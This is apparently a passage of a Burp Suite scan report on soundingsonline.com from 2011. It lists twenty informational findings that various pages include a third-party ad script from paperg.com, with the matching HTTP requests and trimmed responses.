http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /advertise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.854. http://www.soundingsonline.com/archives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /archives HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.855. http://www.soundingsonline.com/boat-shop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.856. http://www.soundingsonline.com/boat-shop/know-how previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/know-how

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/know-how HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.857. http://www.soundingsonline.com/boat-shop/new-boats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-boats

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/new-boats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.858. http://www.soundingsonline.com/boat-shop/new-gear previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/new-gear

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/new-gear HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.859. http://www.soundingsonline.com/boat-shop/on-powerboats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-powerboats

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/on-powerboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.860. http://www.soundingsonline.com/boat-shop/on-sailboats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/on-sailboats

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/on-sailboats HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.861. http://www.soundingsonline.com/boat-shop/q-a-a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/q-a-a

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/q-a-a HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.862. http://www.soundingsonline.com/boat-shop/sea-savvy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/sea-savvy

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/sea-savvy HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.863. http://www.soundingsonline.com/boat-shop/tech-talk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/tech-talk

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/tech-talk HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.864. http://www.soundingsonline.com/boat-shop/used-boat-review previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/boat-shop/used-boat-review

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /boat-shop/used-boat-review HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.865. http://www.soundingsonline.com/calendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/calendar

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /calendar HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.866. http://www.soundingsonline.com/career-opportunities previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/career-opportunities

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /career-opportunities HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.867. http://www.soundingsonline.com/columns-blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.868. http://www.soundingsonline.com/columns-blogs/bay-tripper previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/bay-tripper

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/bay-tripper HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.869. http://www.soundingsonline.com/columns-blogs/books previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/books

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/books HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.870. http://www.soundingsonline.com/columns-blogs/new-england-fishing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/new-england-fishing

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/new-england-fishing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.871. http://www.soundingsonline.com/columns-blogs/under-way previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/columns-blogs/under-way

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /columns-blogs/under-way HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
-->

<script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

18.872. http://www.soundingsonline.com/component/chronocontact/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/chronocontact/

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /component/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

18.873. http://www.soundingsonline.com/component/content/article/237622 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/component/content/article/237622

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET /component/content/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
